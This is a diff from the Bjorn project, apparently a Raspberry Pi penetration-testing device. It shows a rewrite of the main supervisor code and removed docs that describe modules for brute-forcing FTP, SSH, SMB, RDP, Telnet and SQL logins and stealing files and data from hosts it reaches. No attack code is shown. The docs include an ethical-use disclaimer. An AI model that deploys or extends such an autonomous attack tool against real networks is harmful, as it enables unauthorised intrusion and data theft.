"""Main class for Bjorn. Manages the primary operations of the application.""" """Main class for Bjorn. Manages orchestration lifecycle."""
def __init__(self, shared_data):
self.shared_data = shared_data def __init__(self, shared_data_):
self.shared_data = shared_data_
self.commentaire_ia = Commentaireia() self.commentaire_ia = Commentaireia()
self.orchestrator_thread = None self.orchestrator_thread = None
self.orchestrator = None self.orchestrator = None
self.network_connected = False self.network_connected = False
self.wifi_connected = False self.wifi_connected = False
self.previous_network_connected = None # Pour garder une trace de l'état précédent self.previous_network_connected = None
self._orch_lock = threading.Lock()
self._last_net_check = 0 # Throttling for network scan
self._last_orch_stop_attempt = 0.0
def run(self): def run(self):
"""Main loop for Bjorn. Waits for Wi-Fi connection and starts Orchestrator.""" """Main loop for Bjorn. Waits for network and starts/stops Orchestrator based on mode."""
# Wait for startup delay if configured in shared data if hasattr(self.shared_data, "startup_delay") and self.shared_data.startup_delay > 0:
if hasattr(self.shared_data, 'startup_delay') and self.shared_data.startup_delay > 0:
logger.info(f"Waiting for startup delay: {self.shared_data.startup_delay} seconds") logger.info(f"Waiting for startup delay: {self.shared_data.startup_delay} seconds")
time.sleep(self.shared_data.startup_delay) time.sleep(self.shared_data.startup_delay)
# Main loop to keep Bjorn running backoff_s = 1.0
while not self.shared_data.should_exit: while not self.shared_data.should_exit:
if not self.shared_data.manual_mode: try:
self.check_and_start_orchestrator() # Manual mode must stop orchestration so the user keeps full control.
time.sleep(10) # Main loop idle waiting if self.shared_data.operation_mode == "MANUAL":
# Avoid spamming stop requests if already stopped.
if self.orchestrator_thread is not None and self.orchestrator_thread.is_alive():
self.stop_orchestrator()
else:
self.check_and_start_orchestrator()
time.sleep(5)
backoff_s = 1.0 # Reset backoff on success
except Exception as exc:
logger.error(f"Bjorn main loop error: {exc}")
logger.error_throttled(
"Bjorn main loop entering backoff due to repeated errors",
key="bjorn_main_loop_backoff",
interval_s=60,
)
time.sleep(backoff_s)
backoff_s = min(backoff_s * 2.0, 30.0)
def check_and_start_orchestrator(self): def check_and_start_orchestrator(self):
"""Check Wi-Fi and start the orchestrator if connected.""" if self.shared_data.operation_mode == "MANUAL":
return
if self.is_network_connected(): if self.is_network_connected():
self.wifi_connected = True self.wifi_connected = True
if self.orchestrator_thread is None or not self.orchestrator_thread.is_alive(): if self.orchestrator_thread is None or not self.orchestrator_thread.is_alive():
self.start_orchestrator() self.start_orchestrator()
else: else:
self.wifi_connected = False self.wifi_connected = False
logger.info("Waiting for Wi-Fi connection to start Orchestrator...") logger.info_throttled(
"Waiting for network connection to start Orchestrator...",
key="bjorn_wait_network",
interval_s=30,
)
def start_orchestrator(self): def start_orchestrator(self):
"""Start the orchestrator thread.""" with self._orch_lock:
self.is_network_connected() # reCheck if Wi-Fi is connected before starting the orchestrator # Re-check network inside lock
# time.sleep(10) # Wait for network to stabilize if not self.network_connected:
if self.wifi_connected: # Check if Wi-Fi is connected before starting the orchestrator return
if self.orchestrator_thread is None or not self.orchestrator_thread.is_alive(): if self.orchestrator_thread is not None and self.orchestrator_thread.is_alive():
logger.info("Starting Orchestrator thread...") logger.debug("Orchestrator thread is already running.")
self.shared_data.orchestrator_should_exit = False return
self.shared_data.manual_mode = False
self.orchestrator = Orchestrator() logger.info("Starting Orchestrator thread...")
self.orchestrator_thread = threading.Thread(target=self.orchestrator.run) self.shared_data.orchestrator_should_exit = False
self.orchestrator_thread.start()
logger.info("Orchestrator thread started, automatic mode activated.")
else:
logger.info("Orchestrator thread is already running.")
else:
pass
self.orchestrator = Orchestrator()
self.orchestrator_thread = threading.Thread(
target=self.orchestrator.run,
daemon=True,
name="OrchestratorMain",
)
self.orchestrator_thread.start()
logger.info("Orchestrator thread started.")
def stop_orchestrator(self): def stop_orchestrator(self):
"""Stop the orchestrator thread.""" with self._orch_lock:
self.shared_data.manual_mode = True thread = self.orchestrator_thread
logger.info("Stop button pressed. Manual mode activated & Stopping Orchestrator...") if thread is None or not thread.is_alive():
if self.orchestrator_thread is not None and self.orchestrator_thread.is_alive(): self.orchestrator_thread = None
logger.info("Stopping Orchestrator thread...") self.orchestrator = None
return
# Keep MANUAL sticky so supervisor does not auto-restart orchestration.
try:
self.shared_data.operation_mode = "MANUAL"
except Exception:
pass
now = time.time()
if now - self._last_orch_stop_attempt >= 10.0:
logger.info("Stop requested: stopping Orchestrator")
self._last_orch_stop_attempt = now
self.shared_data.orchestrator_should_exit = True self.shared_data.orchestrator_should_exit = True
self.orchestrator_thread.join() self.shared_data.queue_event.set() # Wake up thread
logger.info("Orchestrator thread stopped.") thread.join(timeout=10.0)
if thread.is_alive():
logger.warning_throttled(
"Orchestrator thread did not stop gracefully",
key="orch_stop_not_graceful",
interval_s=20,
)
return
self.orchestrator_thread = None
self.orchestrator = None
self.shared_data.bjorn_orch_status = "IDLE" self.shared_data.bjorn_orch_status = "IDLE"
self.shared_data.bjorn_status_text2 = "" self.shared_data.bjorn_status_text2 = ""
self.shared_data.manual_mode = True
else:
logger.info("Orchestrator thread is not running.")
def is_network_connected(self): def is_network_connected(self):
"""Checks for network connectivity on eth0 or wlan0 using ip command (replacing deprecated ifconfig).""" """Checks for network connectivity with throttling and low-CPU checks."""
logger = logging.getLogger("Bjorn.py") now = time.time()
# Throttling: Do not scan more than once every 10 seconds
if now - self._last_net_check < 10:
return self.network_connected
self._last_net_check = now
def interface_has_ip(interface_name): def interface_has_ip(interface_name):
try: try:
# Use 'ip -4 addr show <interface>' to check for IPv4 address # OPTIMIZATION: Check /sys/class/net first to avoid spawning subprocess if interface doesn't exist
if not os.path.exists(f"/sys/class/net/{interface_name}"):
return False
# Check for IP address
result = subprocess.run( result = subprocess.run(
['ip', '-4', 'addr', 'show', interface_name], ["ip", "-4", "addr", "show", interface_name],
stdout=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, stderr=subprocess.PIPE,
text=True text=True,
timeout=2,
) )
if result.returncode != 0: if result.returncode != 0:
return False return False
# Check if output contains "inet" which indicates an IP address return "inet " in result.stdout
return 'inet' in result.stdout
except Exception: except Exception:
return False return False
eth_connected = interface_has_ip('eth0') eth_connected = interface_has_ip("eth0")
wifi_connected = interface_has_ip('wlan0') wifi_connected = interface_has_ip("wlan0")
self.network_connected = eth_connected or wifi_connected self.network_connected = eth_connected or wifi_connected
if self.network_connected != self.previous_network_connected: if self.network_connected != self.previous_network_connected:
if self.network_connected: if self.network_connected:
logger.info(f"Network is connected (eth0={eth_connected}, wlan0={wifi_connected}).") logger.info(f"Network status changed: Connected (eth0={eth_connected}, wlan0={wifi_connected})")
else: else:
logger.warning("No active network connections found.") logger.warning("Network status changed: Connection lost")
self.previous_network_connected = self.network_connected self.previous_network_connected = self.network_connected
return self.network_connected return self.network_connected
@staticmethod @staticmethod
def start_display(): def start_display(old_display=None):
"""Start the display thread""" # Ensure the previous Display's controller is fully stopped to release frames
display = Display(shared_data) if old_display is not None:
display_thread = threading.Thread(target=display.run) try:
display_thread.start() old_display.display_controller.stop(timeout=3.0)
return display_thread except Exception:
pass
def handle_exit(sig, frame, display_thread, bjorn_thread, web_thread): display = Display(shared_data)
"""Handles the termination of the main, display, and web threads.""" display_thread = threading.Thread(
target=display.run,
daemon=True,
name="DisplayMain",
)
display_thread.start()
return display_thread, display
def _request_shutdown():
"""Signals all threads to stop."""
shared_data.should_exit = True shared_data.should_exit = True
shared_data.orchestrator_should_exit = True # Ensure orchestrator stops shared_data.orchestrator_should_exit = True
shared_data.display_should_exit = True # Ensure display stops shared_data.display_should_exit = True
shared_data.webapp_should_exit = True # Ensure web server stops shared_data.webapp_should_exit = True
handle_exit_display(sig, frame, display_thread) shared_data.queue_event.set()
if display_thread.is_alive():
display_thread.join()
if bjorn_thread.is_alive(): def handle_exit(
bjorn_thread.join() sig,
if web_thread.is_alive(): frame,
web_thread.join() display_thread,
logger.info("Main loop finished. Clean exit.") bjorn_thread,
sys.exit(0) web_thread_obj,
health_thread=None,
runtime_state_thread=None,
from_signal=False,
):
global _shutdown_started
with _shutdown_lock:
if _shutdown_started:
if from_signal:
logger.warning("Forcing exit (SIGINT/SIGTERM received twice)")
os._exit(130)
return
_shutdown_started = True
logger.info(f"Shutdown signal received: {sig}")
_request_shutdown()
# 1. Stop Display (handles EPD cleanup)
try:
handle_exit_display(sig, frame, display_thread)
except Exception:
pass
# 2. Stop Health Monitor
try:
if health_thread and hasattr(health_thread, "stop"):
health_thread.stop()
except Exception:
pass
# 2b. Stop Runtime State Updater
try:
if runtime_state_thread and hasattr(runtime_state_thread, "stop"):
runtime_state_thread.stop()
except Exception:
pass
# 3. Stop Web Server
try:
if web_thread_obj and hasattr(web_thread_obj, "shutdown"):
web_thread_obj.shutdown()
except Exception:
pass
# 4. Join all threads
for thread in (display_thread, bjorn_thread, web_thread_obj, health_thread, runtime_state_thread):
try:
if thread and thread.is_alive():
thread.join(timeout=5.0)
except Exception:
pass
# 5. Close Database (Prevent corruption)
try:
if hasattr(shared_data, "db") and hasattr(shared_data.db, "close"):
shared_data.db.close()
except Exception as exc:
logger.error(f"Database shutdown error: {exc}")
logger.info("Bjorn stopped. Clean exit.")
_release_instance_lock()
if from_signal:
sys.exit(0)
def _install_thread_excepthook():
def _hook(args):
logger.error(f"Unhandled thread exception: {args.thread.name} - {args.exc_type.__name__}: {args.exc_value}")
# We don't force shutdown here to avoid killing the app on minor thread glitches,
# unless it's critical. The Crash Shield will handle restarts.
threading.excepthook = _hook
if __name__ == "__main__": if __name__ == "__main__":
logger.info("Starting threads") if not _acquire_instance_lock():
sys.exit(1)
atexit.register(_release_instance_lock)
_install_thread_excepthook()
display_thread = None
display_instance = None
bjorn_thread = None
health_thread = None
runtime_state_thread = None
last_gc_time = time.time()
try: try:
logger.info("Loading shared data config...") logger.info("Bjorn Startup: Loading config...")
shared_data.load_config() shared_data.load_config()
logger.info("Starting display thread...") logger.info("Starting Runtime State Updater...")
shared_data.display_should_exit = False # Initialize display should_exit runtime_state_thread = RuntimeStateUpdater(shared_data)
display_thread = Bjorn.start_display() runtime_state_thread.start()
logger.info("Starting Bjorn thread...") logger.info("Starting Display...")
shared_data.display_should_exit = False
display_thread, display_instance = Bjorn.start_display()
logger.info("Starting Bjorn Core...")
bjorn = Bjorn(shared_data) bjorn = Bjorn(shared_data)
shared_data.bjorn_instance = bjorn # Assigner l'instance de Bjorn à shared_data shared_data.bjorn_instance = bjorn
bjorn_thread = threading.Thread(target=bjorn.run) bjorn_thread = threading.Thread(target=bjorn.run, daemon=True, name="BjornMain")
bjorn_thread.start() bjorn_thread.start()
if shared_data.config["websrv"]: if shared_data.config.get("websrv", False):
logger.info("Starting the web server...") logger.info("Starting Web Server...")
web_thread.start() if not web_thread.is_alive():
web_thread.start()
signal.signal(signal.SIGINT, lambda sig, frame: handle_exit(sig, frame, display_thread, bjorn_thread, web_thread)) health_interval = int(shared_data.config.get("health_log_interval", 60))
signal.signal(signal.SIGTERM, lambda sig, frame: handle_exit(sig, frame, display_thread, bjorn_thread, web_thread)) health_thread = HealthMonitor(shared_data, interval_s=health_interval)
health_thread.start()
except Exception as e: # Signal Handlers
logger.error(f"An exception occurred during thread start: {e}") exit_handler = lambda s, f: handle_exit(
handle_exit_display(signal.SIGINT, None) s,
exit(1) f,
display_thread,
bjorn_thread,
web_thread,
health_thread,
runtime_state_thread,
True,
)
signal.signal(signal.SIGINT, exit_handler)
signal.signal(signal.SIGTERM, exit_handler)
# --- SUPERVISOR LOOP (Crash Shield) ---
restart_times = []
max_restarts = 5
restart_window_s = 300
logger.info("Bjorn Supervisor running.")
while not shared_data.should_exit:
time.sleep(2) # CPU Friendly polling
now = time.time()
# --- OPTIMIZATION: Periodic Garbage Collection ---
# Forces cleanup of circular references and free RAM every 2 mins
if now - last_gc_time > 120:
gc.collect()
last_gc_time = now
logger.debug("System: Forced Garbage Collection executed.")
# --- CRASH SHIELD: Bjorn Thread ---
if bjorn_thread and not bjorn_thread.is_alive() and not shared_data.should_exit:
restart_times = [t for t in restart_times if (now - t) <= restart_window_s]
restart_times.append(now)
if len(restart_times) <= max_restarts:
logger.warning("Crash Shield: Restarting Bjorn Main Thread")
bjorn_thread = threading.Thread(target=bjorn.run, daemon=True, name="BjornMain")
bjorn_thread.start()
else:
logger.critical("Crash Shield: Bjorn exceeded restart budget. Shutting down.")
_request_shutdown()
break
# --- CRASH SHIELD: Display Thread ---
if display_thread and not display_thread.is_alive() and not shared_data.should_exit:
restart_times = [t for t in restart_times if (now - t) <= restart_window_s]
restart_times.append(now)
if len(restart_times) <= max_restarts:
logger.warning("Crash Shield: Restarting Display Thread")
display_thread, display_instance = Bjorn.start_display(old_display=display_instance)
else:
logger.critical("Crash Shield: Display exceeded restart budget. Shutting down.")
_request_shutdown()
break
# --- CRASH SHIELD: Runtime State Updater ---
if runtime_state_thread and not runtime_state_thread.is_alive() and not shared_data.should_exit:
restart_times = [t for t in restart_times if (now - t) <= restart_window_s]
restart_times.append(now)
if len(restart_times) <= max_restarts:
logger.warning("Crash Shield: Restarting Runtime State Updater")
runtime_state_thread = RuntimeStateUpdater(shared_data)
runtime_state_thread.start()
else:
logger.critical("Crash Shield: Runtime State Updater exceeded restart budget. Shutting down.")
_request_shutdown()
break
# Exit cleanup
if health_thread:
health_thread.stop()
if runtime_state_thread:
runtime_state_thread.stop()
handle_exit(
signal.SIGTERM,
None,
display_thread,
bjorn_thread,
web_thread,
health_thread,
runtime_state_thread,
False,
)
except Exception as exc:
logger.critical(f"Critical bootstrap failure: {exc}")
_request_shutdown()
# Try to clean up anyway
try:
handle_exit(
signal.SIGTERM,
None,
display_thread,
bjorn_thread,
web_thread,
health_thread,
runtime_state_thread,
False,
)
except:
pass
sys.exit(1)

View File

@@ -1,40 +0,0 @@
# 📝 Code of Conduct
Take Note About This... **Take Note...**
## 🤝 Our Commitment
We are committed to fostering an open and welcoming environment for all contributors. As such, everyone who participates in **Bjorn** is expected to adhere to the following code of conduct.
## 🌟 Expected Behavior
- **Respect:** Be respectful of differing viewpoints and experiences.
- **Constructive Feedback:** Provide constructive feedback and be open to receiving it.
- **Empathy and Kindness:** Show empathy and kindness towards other contributors.
- **Respect for Maintainers:** Respect the decisions of the maintainers.
- **Positive Intent:** Assume positive intent in interactions with others.
## 🚫 Unacceptable Behavior
- **Harassment or Discrimination:** Harassment or discrimination in any form.
- **Inappropriate Language or Imagery:** Use of inappropriate language or imagery.
- **Personal Attacks:** Personal attacks or insults.
- **Public or Private Harassment:** Public or private harassment.
## 📢 Reporting Misconduct
If you encounter any behavior that violates this code of conduct, please report it by contacting [bjorn-cyberviking@outlook.com](mailto:bjorn-cyberviking@outlook.com). All complaints will be reviewed and handled appropriately.
## ⚖️ Enforcement
Instances of unacceptable behavior may be addressed by the project maintainers, who are responsible for clarifying and enforcing this code of conduct. Violations may result in temporary or permanent bans from the project and related spaces.
## 🙏 Acknowledgments
This code of conduct is adapted from the [Contributor Covenant, version 2.0](https://www.contributor-covenant.org/version/2/0/code_of_conduct.html).
---
## 📜 License
2024 - Bjorn is distributed under the MIT License. For more details, please refer to the [LICENSE](LICENSE) file included in this repository.

View File

@@ -1,51 +0,0 @@
# 🤝 Contributing to Bjorn
We welcome contributions to Bjorn! To make sure the process goes smoothly, please follow these guidelines:
## 📋 Code of Conduct
Please note that all participants in our project are expected to follow our [Code of Conduct](#-code-of-conduct). Make sure to review it before contributing.
## 🛠 How to Contribute
1. **Fork the repository**:
Fork the project to your GitHub account using the GitHub interface.
2. **Create a new branch**:
Use a descriptive branch name for your feature or bugfix:
git checkout -b feature/your-feature-name
3. **Make your changes**:
Implement your feature or fix the bug in your branch. Make sure to include tests where applicable and follow coding standards.
4. **Test your changes**:
Run the test suite to ensure your changes dont break any functionality:
- ...
5. **Commit your changes**:
Use meaningful commit messages that explain what you have done:
git commit -m "Add feature/fix: Description of changes"
6. **Push your changes**:
Push your changes to your fork:
git push origin feature/your-feature-name
7. **Submit a Pull Request**:
Create a pull request on the main repository, detailing the changes youve made. Link any issues your changes resolve and provide context.
## 📑 Guidelines for Contributions
- **Lint your code** before submitting a pull request. We use [ESLint](https://eslint.org/) for frontend and [pylint](https://www.pylint.org/) for backend linting.
- Ensure **test coverage** for your code. Uncovered code may delay the approval process.
- Write clear, concise **commit messages**.
Thank you for helping improve!
---
## 📜 License
2024 - Bjorn is distributed under the MIT License. For more details, please refer to the [LICENSE](LICENSE) file included in this repository.

View File

@@ -1,373 +0,0 @@
# 🖲️ Bjorn Development
<p align="center">
<img src="https://github.com/user-attachments/assets/c5eb4cc1-0c3d-497d-9422-1614651a84ab" alt="thumbnail_IMG_0546" width="98">
</p>
## 📚 Table of Contents
- [Design](#-design)
- [Educational Aspects](#-educational-aspects)
- [Disclaimer](#-disclaimer)
- [Extensibility](#-extensibility)
- [Development Status](#-development-status)
- [Project Structure](#-project-structure)
- [Core Files](#-core-files)
- [Actions](#-actions)
- [Data Structure](#-data-structure)
- [Detailed Project Description](#-detailed-project-description)
- [Behaviour of Bjorn](#-behavior-of-bjorn)
- [Running Bjorn](#-running-bjorn)
- [Manual Start](#-manual-start)
- [Service Control](#-service-control)
- [Fresh Start](#-fresh-start)
- [Important Configuration Files](#-important-configuration-files)
- [Shared Configuration](#-shared-configuration-shared_configjson)
- [Actions Configuration](#-actions-configuration-actionsjson)
- [E-Paper Display Support](#-e-paper-display-support)
- [Ghosting Removed](#-ghosting-removed)
- [Development Guidelines](#-development-guidelines)
- [Adding New Actions](#-adding-new-actions)
- [Testing](#-testing)
- [Web Interface](#-web-interface)
- [Project Roadmap](#-project-roadmap)
- [Current Focus](#-future-plans)
- [Future Plans](#-future-plans)
- [License](#-license)
## 🎨 Design
- **Portability**: Self-contained and portable device, ideal for penetration testing.
- **Modularity**: Extensible architecture allowing addition of new actions.
- **Visual Interface**: The e-Paper HAT provides a visual interface for monitoring the ongoing actions, displaying results or stats, and interacting with Bjorn .
## 📔 Educational Aspects
- **Learning Tool**: Designed as an educational tool to understand cybersecurity concepts and penetration testing techniques.
- **Practical Experience**: Provides a practical means for students and professionals to familiarize themselves with network security practices and vulnerability assessment tools.
## ✒️ Disclaimer
- **Ethical Use**: This project is strictly for educational purposes.
- **Responsibility**: The author and contributors disclaim any responsibility for misuse of Bjorn.
- **Legal Compliance**: Unauthorized use of this tool for malicious activities is prohibited and may be prosecuted by law.
## 🧩 Extensibility
- **Evolution**: The main purpose of Bjorn is to gain new actions and extend his arsenal over time.
- **Modularity**: Actions are designed to be modular and can be easily extended or modified to add new functionality.
- **Possibilities**: From capturing pcap files to cracking hashes, man-in-the-middle attacks, and more—the possibilities are endless.
- **Contribution**: It's up to the user to develop new actions and add them to the project.
## 🔦 Development Status
- **Project Status**: Ongoing development.
- **Current Version**: Scripted auto-installer, or manual installation. Not yet packaged with Raspberry Pi OS.
- **Reason**: The project is still in an early stage, requiring further development and debugging.
### 🗂️ Project Structure
```
Bjorn/
├── Bjorn.py
├── comment.py
├── display.py
├── epd_helper.py
├── init_shared.py
├── kill_port_8000.sh
├── logger.py
├── orchestrator.py
├── requirements.txt
├── shared.py
├── utils.py
├── webapp.py
├── __init__.py
├── actions/
│ ├── ftp_connector.py
│ ├── ssh_connector.py
│ ├── smb_connector.py
│ ├── rdp_connector.py
│ ├── telnet_connector.py
│ ├── sql_connector.py
│ ├── steal_files_ftp.py
│ ├── steal_files_ssh.py
│ ├── steal_files_smb.py
│ ├── steal_files_rdp.py
│ ├── steal_files_telnet.py
│ ├── steal_data_sql.py
│ ├── nmap_vuln_scanner.py
│ ├── scanning.py
│ └── __init__.py
├── backup/
│ ├── backups/
│ └── uploads/
├── config/
├── data/
│ ├── input/
│ │ └── dictionary/
│ ├── logs/
│ └── output/
│ ├── crackedpwd/
│ ├── data_stolen/
│ ├── scan_results/
│ ├── vulnerabilities/
│ └── zombies/
└── resources/
└── waveshare_epd/
```
### ⚓ Core Files
#### Bjorn.py
The main entry point for the application. It initializes and runs the main components, including the network scanner, orchestrator, display, and web server.
#### comment.py
Handles generating all the Bjorn comments displayed on the e-Paper HAT based on different themes/actions and statuses.
#### display.py
Manages the e-Paper HAT display, updating the screen with Bjorn character, the dialog/comments, and the current information such as network status, vulnerabilities, and various statistics.
#### epd_helper.py
Handles the low-level interactions with the e-Paper display hardware.
#### logger.py
Defines a custom logger with specific formatting and handlers for console and file logging. It also includes a custom log level for success messages.
#### orchestrator.py
Bjorns AI, a heuristic engine that orchestrates the different actions such as network scanning, vulnerability scanning, attacks, and file stealing. It loads and executes actions based on the configuration and sets the status of the actions and Bjorn.
#### shared.py
Defines the `SharedData` class that holds configuration settings, paths, and methods for updating and managing shared data across different modules.
#### init_shared.py
Initializes shared data that is used across different modules. It loads the configuration and sets up necessary paths and variables.
#### utils.py
Contains utility functions used throughout the project.
#### webapp.py
Sets up and runs a web server to provide a web interface for changing settings, monitoring and interacting with Bjorn.
### ▶️ Actions
#### actions/scanning.py
Conducts network scanning to identify live hosts and open ports. It updates the network knowledge base (`netkb`) and generates scan results.
#### actions/nmap_vuln_scanner.py
Performs vulnerability scanning using Nmap. It parses the results and updates the vulnerability summary for each host.
#### Protocol Connectors
- **ftp_connector.py**: Brute-force attacks on FTP services.
- **ssh_connector.py**: Brute-force attacks on SSH services.
- **smb_connector.py**: Brute-force attacks on SMB services.
- **rdp_connector.py**: Brute-force attacks on RDP services.
- **telnet_connector.py**: Brute-force attacks on Telnet services.
- **sql_connector.py**: Brute-force attacks on SQL services.
#### File Stealing Modules
- **steal_files_ftp.py**: Steals files from FTP servers.
- **steal_files_smb.py**: Steals files from SMB shares.
- **steal_files_ssh.py**: Steals files from SSH servers.
- **steal_files_telnet.py**: Steals files from Telnet servers.
- **steal_data_sql.py**: Extracts data from SQL databases.
### 📇 Data Structure
#### Network Knowledge Base (netkb.csv)
Located at `data/netkb.csv`. Stores information about:
- Known hosts and their status. (Alive or offline)
- Open ports and vulnerabilities.
- Action execution history. (Success or failed)
**Preview Example:**
![netkb1](https://github.com/infinition/Bjorn/assets/37984399/f641a565-2765-4280-a7d7-5b25c30dcea5)
![netkb2](https://github.com/infinition/Bjorn/assets/37984399/f08114a2-d7d1-4f50-b1c4-a9939ba66056)
#### Scan Results
Located in `data/output/scan_results/`.
This file is generated everytime the network is scanned. It is used to consolidate the data and update netkb.
**Example:**
![Scan result](https://github.com/infinition/Bjorn/assets/37984399/eb4a313a-f90c-4c43-b699-3678271886dc)
#### Live Status (livestatus.csv)
Contains real-time information displayed on the e-Paper HAT:
- Total number of known hosts.
- Currently alive hosts.
- Open ports count.
- Other runtime statistics.
## 📖 Detailed Project Description
### 👀 Behavior of Bjorn
Once launched, Bjorn performs the following steps:
1. **Initialization**: Loads configuration, initializes shared data, and sets up necessary components such as the e-Paper HAT display.
2. **Network Scanning**: Scans the network to identify live hosts and open ports. Updates the network knowledge base (`netkb`) with the results.
3. **Orchestration**: Orchestrates different actions based on the configuration and network knowledge base. This includes performing vulnerability scanning, attacks, and file stealing.
4. **Vulnerability Scanning**: Performs vulnerability scans on identified hosts and updates the vulnerability summary.
5. **Brute-Force Attacks and File Stealing**: Starts brute-force attacks and steals files based on the configuration criteria.
6. **Display Updates**: Continuously updates the e-Paper HAT display with current information such as network status, vulnerabilities, and various statistics. Bjorn also displays random comments based on different themes and statuses.
7. **Web Server**: Provides a web interface for monitoring and interacting with Bjorn.
## ▶️ Running Bjorn
### 📗 Manual Start
To manually start Bjorn (without the service, ensure the service is stopped « sudo systemctl stop bjorn.service »):
```bash
cd /home/bjorn/Bjorn
# Run Bjorn
sudo python Bjorn.py
```
### 🕹️ Service Control
Control the Bjorn service:
```bash
# Start Bjorn
sudo systemctl start bjorn.service
# Stop Bjorn
sudo systemctl stop bjorn.service
# Check status
sudo systemctl status bjorn.service
# View logs
sudo journalctl -u bjorn.service
```
### 🪄 Fresh Start
To reset Bjorn to a clean state:
```bash
sudo rm -rf /home/bjorn/Bjorn/config/*.json \
/home/bjorn/Bjorn/data/*.csv \
/home/bjorn/Bjorn/data/*.log \
/home/bjorn/Bjorn/data/output/data_stolen/* \
/home/bjorn/Bjorn/data/output/crackedpwd/* \
/home/bjorn/Bjorn/config/* \
/home/bjorn/Bjorn/data/output/scan_results/* \
/home/bjorn/Bjorn/__pycache__ \
/home/bjorn/Bjorn/config/__pycache__ \
/home/bjorn/Bjorn/data/__pycache__ \
/home/bjorn/Bjorn/actions/__pycache__ \
/home/bjorn/Bjorn/resources/__pycache__ \
/home/bjorn/Bjorn/web/__pycache__ \
/home/bjorn/Bjorn/*.log \
/home/bjorn/Bjorn/resources/waveshare_epd/__pycache__ \
/home/bjorn/Bjorn/data/logs/* \
/home/bjorn/Bjorn/data/output/vulnerabilities/* \
/home/bjorn/Bjorn/data/logs/*
```
Everything will be recreated automatically at the next launch of Bjorn.
## ❇️ Important Configuration Files
### 🔗 Shared Configuration (`shared_config.json`)
Defines various settings for Bjorn, including:
- Boolean settings (`manual_mode`, `websrv`, `debug_mode`, etc.).
- Time intervals and delays.
- Network settings.
- Port lists and blacklists.
These settings are accessible on the webpage.
### 🛠️ Actions Configuration (`actions.json`)
Lists the actions to be performed by Bjorn, including (dynamically generated with the content of the folder):
- Module and class definitions.
- Port assignments.
- Parent-child relationships.
- Action status definitions.
## 📟 E-Paper Display Support
Currently, hardcoded for the 2.13-inch V2 & V4 e-Paper HAT.
My program automatically detect the screen model and adapt the python expressions into my code.
For other versions:
- As I don't have the v1 and v3 to validate my algorithm, I just hope it will work properly.
### 🍾 Ghosting Removed!
In my journey to make Bjorn work with the different screen versions, I struggled, hacking several parameters and found out that it was possible to remove the ghosting of screens! I let you see this, I think this method will be very useful for all other projects with the e-paper screen!
## ✍️ Development Guidelines
### Adding New Actions
1. Create a new action file in `actions/`.
2. Implement required methods:
- `__init__(self, shared_data)`
- `execute(self, ip, port, row, status_key)`
3. Add the action to `actions.json`.
4. Follow existing action patterns.
### 🧪 Testing
1. Create a test environment.
2. Use an isolated network.
3. Follow ethical guidelines.
4. Document test cases.
## 💻 Web Interface
- **Access**: `http://[device-ip]:8000`
- **Features**:
- Real-time monitoring with a console.
- Configuration management.
- Viewing results. (Credentials and files)
- System control.
## 🧭 Project Roadmap
### 🪛 Current Focus
- Stability improvements.
- Bug fixes.
- Service reliability.
- Documentation updates.
### 🧷 Future Plans
- Additional attack modules.
- Enhanced reporting.
- Improved user interface.
- Extended protocol support.
---
## 📜 License
2024 - Bjorn is distributed under the MIT License. For more details, please refer to the [LICENSE](LICENSE) file included in this repository.

View File

@@ -1,468 +0,0 @@
## 🔧 Installation and Configuration
<p align="center">
<img src="https://github.com/user-attachments/assets/c5eb4cc1-0c3d-497d-9422-1614651a84ab" alt="thumbnail_IMG_0546" width="98">
</p>
## 📚 Table of Contents
- [Prerequisites](#-prerequisites)
- [Quick Install](#-quick-install)
- [Manual Install](#-manual-install)
- [License](#-license)
Use Raspberry Pi Imager to install your OS
https://www.raspberrypi.com/software/
### 📌 Prerequisites for RPI zero W (32bits)
![image](https://github.com/user-attachments/assets/3980ec5f-a8fc-4848-ab25-4356e0529639)
- Raspberry Pi OS installed.
- Stable:
- System: 32-bit
- Kernel version: 6.6
- Debian version: 12 (bookworm) '2024-10-22-raspios-bookworm-armhf-lite'
- Username and hostname set to `bjorn`.
- 2.13-inch e-Paper HAT connected to GPIO pins.
### 📌 Prerequisites for RPI zero W2 (64bits)
![image](https://github.com/user-attachments/assets/e8d276be-4cb2-474d-a74d-b5b6704d22f5)
I did not develop Bjorn for the raspberry pi zero w2 64bits, but several feedbacks have attested that the installation worked perfectly.
- Raspberry Pi OS installed.
- Stable:
- System: 64-bit
- Kernel version: 6.6
- Debian version: 12 (bookworm) '2024-10-22-raspios-bookworm-arm64-lite'
- Username and hostname set to `bjorn`.
- 2.13-inch e-Paper HAT connected to GPIO pins.
At the moment the paper screen v2 v4 have been tested and implemented.
I juste hope the V1 & V3 will work the same.
### ⚡ Quick Install
The fastest way to install Bjorn is using the automatic installation script :
```bash
# Download and run the installer
wget https://raw.githubusercontent.com/infinition/Bjorn/refs/heads/main/install_bjorn.sh
sudo chmod +x install_bjorn.sh
sudo ./install_bjorn.sh
# Choose the choice 1 for automatic installation. It may take a while as a lot of packages and modules will be installed. You must reboot at the end.
```
### 🧰 Manual Install
#### Step 1: Activate SPI & I2C
```bash
sudo raspi-config
```
- Navigate to **"Interface Options"**.
- Enable **SPI**.
- Enable **I2C**.
#### Step 2: System Dependencies
```bash
# Update system
sudo apt-get update && sudo apt-get upgrade -y
# Install required packages
sudo apt install -y \
libjpeg-dev \
zlib1g-dev \
libpng-dev \
python3-dev \
libffi-dev \
libssl-dev \
libgpiod-dev \
libi2c-dev \
libatlas-base-dev \
build-essential \
python3-pip \
wget \
lsof \
git \
libopenjp2-7 \
nmap \
libopenblas-dev \
bluez-tools \
bluez \
dhcpcd5 \
bridge-utils \
python3-pil
# Update Nmap scripts database
sudo nmap --script-updatedb
```
#### Step 3: Bjorn Installation
```bash
# Clone the Bjorn repository
cd /home/bjorn
git clone https://github.com/infinition/Bjorn.git
cd Bjorn
# Install Python dependencies within the virtual environment
sudo pip install -r requirements.txt --break-system-packages
# As i did not succeed "for now" to get a stable installation with a virtual environment, i installed the dependencies system wide (with --break-system-packages), it did not cause any issue so far. You can try to install them in a virtual environment if you want.
```
##### 3.1: Configure E-Paper Display Type
Choose your e-Paper HAT version by modifying the configuration file:
1. Open the configuration file:
```bash
sudo vi /home/bjorn/Bjorn/config/shared_config.json
```
Press i to enter insert mode
Locate the line containing "epd_type":
Change the value according to your screen model:
- For 2.13 V1: "epd_type": "epd2in13",
- For 2.13 V2: "epd_type": "epd2in13_V2",
- For 2.13 V3: "epd_type": "epd2in13_V3",
- For 2.13 V4: "epd_type": "epd2in13_V4",
